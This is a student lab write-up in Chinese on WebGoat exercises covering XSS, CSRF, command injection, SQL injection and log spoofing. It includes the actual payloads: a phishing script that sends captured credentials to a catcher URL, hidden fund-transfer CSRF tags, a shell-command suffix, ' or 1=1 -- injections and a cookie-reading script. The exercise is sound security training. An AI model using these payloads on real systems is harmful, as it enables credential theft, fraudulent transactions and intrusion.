2018-2019 20165226 Exp9 Web安全基礎

2018-2019 20165226 Exp9 Web安全基礎

目錄

---

1、實驗內容說明及基礎問題回答

2、實驗過程

• Webgoat準備

• XSS攻擊
  • ① Phishing with XSS 跨站腳本釣魚攻擊
  • ② Stored XSS Attacks 存儲型XSS攻擊
  • ③ Reflected XSS Attacks 反射型XSS攻擊
• CSRF攻擊
  • ① Cross Site Request Forgery(CSRF)
  • ② CSRF Prompt By-Pass
• SQL注入攻擊
  • ① Command Injection 命令注入
  • ② Numeric SQL Injection
  • ③ Log Spoofing 日誌欺騙
  • ④ String SQL Injection 字符串型注入
  • ⑤ LAB:SQL Injection

3、問題與思考

4、實驗總結

---

---

1、實驗內容說明及基礎問題回答

---

一、實驗內容

本實踐的目標理解經常使用網絡攻擊技術的基本原理。Webgoat實踐下相關實驗。

二、基礎問題回答
（1）SQL注入攻擊原理，如何防護

• 原理:
  • 經過在用戶名、密碼登輸入框中輸入一些',--,#等特殊字符，實現引號閉合、註釋部分SQL語句，利用永真式實現登陸、顯示信息等目的。其實就是輸入框中的字符提交到後臺的數據庫中會與SQL語句組合拼接，針對程序員編程時的疏忽，經過SQL語句，實現無賬號登陸，甚至篡改數據庫。
• 防護辦法：
  • 使用正則表達式過濾傳入的參數;檢查是否包函非法字符,在後臺控制輸入的長度或者禁止用戶輸入一些特殊符號，例如 -- 、' 等
  • 摒棄動態SQL語句，而改用用戶存儲過程來訪問和操做數據。這須要在創建數據庫後，仔細考慮Web程序須要對數據庫進行的各類操做，併爲之創建存儲過程，而後讓Web程序調用存儲過程來完成數據庫操做。

（2）XSS攻擊的原理，如何防護

• 原理：
  • 攻擊者往Web頁面裏插入惡意html標籤或者javascript代碼，當用戶瀏覽該頁或者進行某些操做時，攻擊者利用用戶對原網站的信任，誘騙用戶或瀏覽器執行一些不安全的操做或者向其它網站提交用戶的私密信息。
• 防護辦法：
  • 當惡意代碼值被做爲某一標籤的內容顯示：在不須要html輸入的地方對html 標籤及一些特殊字符( 」 < > & 等等 )作過濾，將其轉化爲不被瀏覽器解釋執行的字符。
  • 當惡意代碼被做爲某一標籤的屬性顯示，經過用 「將屬性截斷來開闢新的屬性或惡意方法：屬性自己存在的 單引號和雙引號都須要進行轉碼；對用戶輸入的html 標籤及標籤屬性作白名單過濾，也能夠對一些存在漏洞的標籤和屬性進行專門過濾。

（3）CSRF攻擊原理，如何防護

• 原理：
  • CSRF就是冒名登陸。跨站請求僞造的核心本質是竊取用戶的Session,或者說Cookie,由於目前主流狀況> Session都是存在Cookie中.攻擊者並不關心被害者具體賬號和密碼,由於一旦用戶進行了登陸,Session就是用戶的惟一憑證,只要攻擊者可以獲得Session,就能夠假裝成被害者進入服務器.
  • 主要是當訪問網站A時輸入用戶名和密碼，在經過驗證後，網站A產生Cookie信息並返回，此時登陸網站A成功，可正常發送請求到網站A。在未退出網站A前，若訪問另外一個網站B，網站B可返回一些攻擊性代碼並請求訪問網站A；所以在網站B的請求下，向網站A發出請求。但網站A不知道該請求惡意的，所以仍是會執行該惡意代碼
• 防護辦法：
  • 經過 referer、token 或者 驗證碼 來檢測用戶提交。
  • 儘可能不要在頁面的連接中暴露用戶隱私信息。
  • 對於用戶修改刪除等操做最好都使用post 操做 。
  • 避免全站通用的cookie，嚴格設置cookie的域。

返回目錄

---

---

2、實驗過程

WebGoat準備

• 介紹：WebGoat是OWASP組織研製出的用於進行web漏洞實驗的應用平臺，用來講明web應用中存在的安全漏洞。WebGoat運行在帶有java虛擬機的平臺之上，當前提供的訓練課程有30多個，其中包括：跨站點腳本攻擊（XSS）、訪問控制、線程安全、操做隱藏字段、操縱參數、弱會話cookie、SQL盲注、數字型SQL注入、字符串型SQL注入、web服務、Open Authentication失效、危險的HTML註釋等等。WebGoat提供了一系列web安全學習的教程，某些課程也給出了視頻演示，指導用戶利用這些漏洞進行攻擊。

• 下載webgoat-container-7.0.1-war-exec.jar文件
  

• 在含有該文件的目錄下使用命令java -jar webgoat-container-7.0.1-war-exec.jar運行Webgoat，出現信息: Starting ProtocolHandler ["http-bio-8080"]說明開啓成功，能夠看到佔用8080端口，實驗過程當中不能關閉終端

• 在瀏覽器中輸入http://localhost:8080/WebGoat進入WebGoat登陸界面,直接用默認用戶名密碼登陸便可
  

---

XSS攻擊

跨站腳本攻擊是經過HTML注入劫持用戶的瀏覽器，任意構造用戶當前瀏覽的HTML內容，能夠模擬用戶當前的操做。這裏實驗的是一種獲取用戶名和密碼的攻擊。

① Phishing with XSS 跨站腳本釣魚攻擊

• 在webgoat找到Cross-Site Scripting （xss）攻擊打開第一個——Phishing with XSS
• 將下面這段代碼輸入到Search:輸入框中，點擊search

<head> <body> <div> <div style="float:left;height:100px;width:50%;background-color:yellow;"></div> <div style="float:left;height:100px;width:50%;background-color:orange;"></div> </div> <div style="background-color:grey;height:200px;clear:both;"></div>   </div></div> </form>   <script> function hack(){  XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("attack.！！！！！！ Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value); }    </script> <form name="phish"> <br> <br> <HR>   <H2>This feature requires account login:</H2> <br>   <br>Enter Username:<br>   <input type="text" name="user">   <br>Enter Password:<br>   <input type="password" name = "pass"> <br>   <input type="submit" name="login" value="login" onclick="hack()"> </form> <br> <br> <HR> </body> </head>

結果會出現代碼中所指定的黃、橙、灰三塊div，並在下方出現了用於欺騙用戶的提示語「This feature requires account login:」和用戶名、密碼輸入框。

• 若是真的在登陸框中輸入用戶名、密碼，eg:20165226 123456，點擊登陸後，會像代碼中alert提示的，顯示被竊取的用戶名和密碼。
  

② Stored XSS Attacks 存儲型XSS攻擊

存儲型XSS的攻擊基本流程:

一、好比在某個論壇提供留言板功能，黑客在留言板內插入惡意的html或者Javascript代碼，而且提交。
二、網站後臺程序將留言內容存儲在數據中
三、而後一個用戶也訪問這個論壇，並刷新了留言板，這時網站後臺從數據庫中讀取了以前黑客的留言內容，而且直接插入在html頁面中，這就可能致使：黑客留言的腳本自己應該做爲內容顯示在留言板的，但此時黑客的留言腳本被瀏覽器解釋執行。

黑客的腳本能夠用來作以下所述的攻擊:

1.經過javascript獲取用戶的cookie，根據這個cookie竊取用戶信息
2.重定向網站到一個釣魚網站
3.從新更改頁面內容，僞裝讓客戶輸入用戶名，密碼，而後提交到黑客的服務器

• 打開Cross-Site Scripting （xss）攻擊中的第二個：Stored XSS Attacks
• 在Message框中輸入上面那段代碼,並點擊submit，Title隨便輸入

• 提交後，下方Message List中會新增剛輸入的Tile名字的連接，點擊連接。
  

• 能夠看到咱們的html已經注入成功，messege部分顯示的是三色框，在下方用戶名密碼處輸入，eg:20165226 123456，點擊提交後，被成功獲取用戶名和密碼：
  

③ Reflected XSS Attacks 反射型XSS攻擊

反射型XSS：

咱們在訪問一個網頁的時候，在URL後面加上參數，服務器根據請求的參數值構造不一樣的HTML返回。
value可能出如今返回的HTML(多是JS,HTML某元素的內容或者屬性)中,
若是將value改爲能夠在瀏覽器中被解釋執行的東西,就造成了反射型XSS.
別人可能修改這個value值，而後將這個惡意的URL發送給你,當URL地址被打開時,
特有的惡意代碼參數就會被HTML解析執行.
它的特色是非持久化,必須用戶點擊帶有特定參數的連接才能引發。

存儲型XSS與反射型XSS的區別：

①存儲型XSS，持久化，代碼是存儲在服務器中的，如在我的信息或發表文章等地方，加入代碼，若是沒有過濾或過濾不嚴，那麼這些代碼將儲存到服務器中，用戶訪問該頁面的時候觸發代碼執行。這種XSS比較危險，容易形成蠕蟲，盜竊cookie等。

②反射型XSS，非持久化，須要欺騙用戶本身去點擊連接才能觸發XSS代碼（服務器中沒有這樣的頁面和內容），通常容易出如今搜索頁面。

• 打開xss的第三個攻擊Reflected XSS Attacks

• 在「Enter your three digit access code:」中輸入點擊Purchase，成功顯示警告框，內容爲咱們script腳本指定的內容：
  

---

CSRF攻擊

跨站請求僞造，儘管聽起來像跨站腳本（XSS），但它與XSS很是不一樣，XSS利用站點內的信任用戶，而CSRF則經過假裝來自受信任用戶的請求來利用受信任的網站。與XSS攻擊相比，CSRF攻擊每每不大流行（所以對其進行防範的資源也至關稀少）和難以防範，因此被認爲比XSS更具危險性。

① Cross Site Request Forgery(CSRF)

• 打開Cross-Site Scripting （xss）攻擊中的第四個：Cross Site Request Forgery(CSRF)

• 查看頁面下方Parameters中的src和menu值，分別爲293和900
  

• 在message框中輸入

<img src="http://localhost:8080/WebGoat/attack?Screen=293&menu=900&transferFunds=5000" width="1" height="1" />

以圖片的的形式將URL放進Message框，這時的URL對其餘用戶是不可見的，用戶一旦點擊圖片，就會觸發一個CSRF事件，點擊Submit提交
- 這裏src值、menu值要根據上一步查看的結果修改，轉帳數額隨便輸入，eg:5000
- 寬高設置成1像素的目的是隱藏該圖片

• 提交後，在Message List中生成以Title命名的連接（消息）。點擊該消息，當前頁面就會下載這個消息並顯示出來，轉走用戶的5000元，從而達到CSRF攻擊的目的。
  

② CSRF Prompt By-Pass

• 打開Cross-Site Scripting （xss）攻擊中的第五個：CSRF Prompt By-Pass

• 同攻擊4，查看頁面下側Parameters中的src和menu值（323和900）
  

• 在title框中輸入學號，message框中輸入代碼

<iframe src="attack?Screen=323&menu=900&transferFunds=6000"> </iframe>
<iframe src="attack?Screen=323&menu=900&transferFunds=CONFIRM"> </iframe>

• 在Message List中生成以Title命名的連接"20165226"。
• 點擊進入後，如圖攻擊成功：
  

---

SQL注入攻擊

SQL注入攻擊是黑客對數據庫進行攻擊的經常使用手段之一。隨着B/S模式應用開發的發展，使用這種模式編寫應用程序的程序員也愈來愈多。可是因爲程序員的水平及經驗也良莠不齊，至關大一部分程序員在編寫代碼的時候，沒有對用戶輸入數據的合法性進行判斷，使應用程序存在安全隱患。用戶能夠提交一段數據庫查詢代碼，根據程序返回的結果，得到某些他想得知的數據，這就是所謂的SQL Injection，即SQL注入。

① Command Injection 命令注入

• 右鍵點擊頁面，選擇inspect Element審查網頁元素對源代碼進行修改，在複選框中任意一欄的代碼後添加"& netstat -an & ipconfig"
  

• 點擊view，能看到網絡端口使用狀況和 IP 地址，攻擊成功
  

② Numeric SQL Injection

顯示全部城市的天氣狀況

• 右鍵點擊頁面，選擇inspect Element審查網頁元素對源代碼進行修改，在選中的城市編號Value值中添加or 1=1
  

• 攻擊成功，顯示全部城市的天氣狀況
  

③ Log Spoofing 日誌欺騙

經過查看下方灰色區域，咱們分析它表明在 Web 服務器的日誌中的記錄的內容。

目的：使用戶名爲「admin」 的用戶在日誌中顯示「成功登陸」。

方法：經過在日誌文件中插入腳本實現。

• 在username中填入 5226%0d%0aLogin Succeeded for username: admin`，利用回車(0D%)和換行符(%0A)讓其在日誌中兩行顯示
  

• 點擊Login，可見5226在Login Fail那行顯示，咱們本身添加的語句在下一行顯示
  

• 能夠向日志文件中添加惡意腳本，腳本的返回信息管理員可以經過瀏覽器看到。用戶名輸入admin <script>alert(document.cookie)</script>，管理員能夠看到彈窗的cookie信息。

④ String SQL Injection 字符串型注入

目的：嘗試經過 SQL 注入將全部信用卡信息顯示出來。

方法：基於如下查詢語句構造本身的 SQL 注入字符串。SELECT * FROM user_data WHERE last_name = '?'。

• 選擇Injection Flaws中的String SQL Injection
• 輸入查詢的用戶名lxs' or 1=1--
  如此lxs 和1=1都成了查詢的條件，而1=1是恆等式，這樣就能select表裏面的全部數據。
  

⑤ LAB:SQL Injection

• 將密碼長度maxlength改成200
  

• 在密碼框輸入' or 1=1 --
  

返回目錄

---

---

3、問題與思考

• 下載jar包後運行中主目錄中沒有所需的攻擊列表，卸載重裝，而後重啓了n次仍是這個界面，無解
  

• 分析：電腦jdk版本和 這個jar的jdk版本不一樣

• 解決方案：換了虛擬機，而後OK

返回目錄

4、實驗總結

經過本次實驗學習了使用WebGoat工具進行SQL注入攻擊、XSS攻擊、CSRF攻擊，主要攻擊方法即是利用語句漏洞。整體挺有意思，對SQL語句格式有了更深掌握。
返回目錄